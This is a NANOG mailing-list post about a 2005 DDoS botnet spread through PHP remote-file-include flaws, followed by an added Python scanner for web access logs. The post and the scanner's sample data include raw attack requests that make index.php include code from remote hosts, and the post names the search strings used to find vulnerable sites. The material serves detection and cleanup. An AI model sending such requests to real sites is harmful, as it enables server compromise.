nanog mailing list archives
Re: Destructive botnet originating from Japan
From: "Barrett G. Lyon" <blyon () prolexic com>
Date: Sat, 24 Dec 2005 10:44:10 -0800
Here is a little update: As of last night authorities were able to seize the IRC server from the ISP in Japan, and there will be extensive follow-up on it. The DDoS attack is now running headless in the happy range of about 3+ Gbps at around 7-9M PPS. The bots will continue attacking us until they receive the stop command from the bot master; there will never be a stop command, so we will continue to see packet love for a few months while people find that they are attacking us. We will publish a new list of the bots on Monday as we idle with this low traffic rate over the weekend.
The attacker was targeting a couple customers that came into our environment after other solutions failed to work for them. After reviewing and comparing notes, it is obvious that the attacks were assassination attempts from a competitor. There was no extortion involved.
If you want to get the bots off your network, watch flow data destined to AS32787 with SYN floods to TCP 80 as the destination.
Sites that use a PHP include (without validating the strings) to pull up different web sections and pages are at risk; a lot of people are reporting infection via "$section.php" and "$page.php". The attacker appears to have used Google to locate sites that use includes in that fashion (searching "index.php?page=" or "index.php?section=").
Reviewing infected machines for logs related to 210.170.60.2 would be an easy way to locate a past infection, but may not be reliable if the attacker starts a new botnet. An example of the log data looks something like this:
    grep 210.170.60.2 access_log
    210.170.60.2 - - [23/Dec/2005:11:45:37 +0000] "GET /index.php?section=http%3A//210.170.60.2/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"
Happy hunting and have nice holidays!

-Barrett

--
Barrett Lyon
CTO and founder
Prolexic Technologies, Inc
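The grep above only finds requests that name one known host. As an added example (not part of the original post or of Prolexic's tooling), the scanner below parses Apache combined-format access log lines and flags any query parameter whose value decodes to a remote URL, which is the remote-include pattern the post describes for "page" and "section"; the sample log lines are constructed (the first is modelled on the line in the post, and 198.51.100.7 and 203.0.113.9 are documentation addresses).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format, which is what the grep output in the post shows.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A query value that decodes to a remote URL is the remote-include signature. The post
# names "page" and "section" as the abused parameters, but any parameter is checked.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def rfi_hits(line, c2_ips=()):
    """Return one dict per query parameter in `line` whose value is a remote URL.

    known_c2 is True when the included URL's host is in c2_ips (for example the
    210.170.60.2 host named in the post). A 200 status only means the page
    answered; by itself it does not prove that the include was executed.
    """
    m = LOG_RE.match(line)
    if not m:
        return []                                  # not combined format; skip, don't crash
    rec = m.groupdict()
    hits = []
    for param, values in parse_qs(urlsplit(rec["target"]).query, keep_blank_values=True).items():
        for value in values:                       # parse_qs already percent-decodes (%3A -> ':')
            if not REMOTE_RE.match(value):
                continue
            host = urlsplit(value.strip()).hostname
            hits.append({
                "client": rec["ip"], "param": param, "url": value, "host": host,
                "status": rec["status"], "ua": rec["ua"], "known_c2": host in c2_ips,
            })
    return hits

def scan(lines, c2_ips=()):
    """Scan an iterable of log lines and return all hits in file order."""
    return [h for line in lines for h in rfi_hits(line, c2_ips)]

# Constructed sample log lines (the first is modelled on the line quoted in the post).
SAMPLE_LOG = [
    '210.170.60.2 - - [23/Dec/2005:11:45:37 +0000] "GET /index.php?section=http%3A//210.170.60.2/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"',
    '203.0.113.9 - - [23/Dec/2005:11:46:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [23/Dec/2005:11:47:11 +0000] "GET /index.php?page=FTP%3A//198.51.100.7/x.txt%3F HTTP/1.0" 200 8010 "-" "libwww-perl/5.8"',
    'garbage line that is not in combined format',
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG, c2_ips={"210.170.60.2"}):
        print(f'{h["client"]} param={h["param"]} host={h["host"]} known_c2={h["known_c2"]} ua={h["ua"]}')
```

Run it against a real access_log with `scan(open("access_log"), c2_ips={...})`; hits with known_c2 False are the ones the plain grep would have missed.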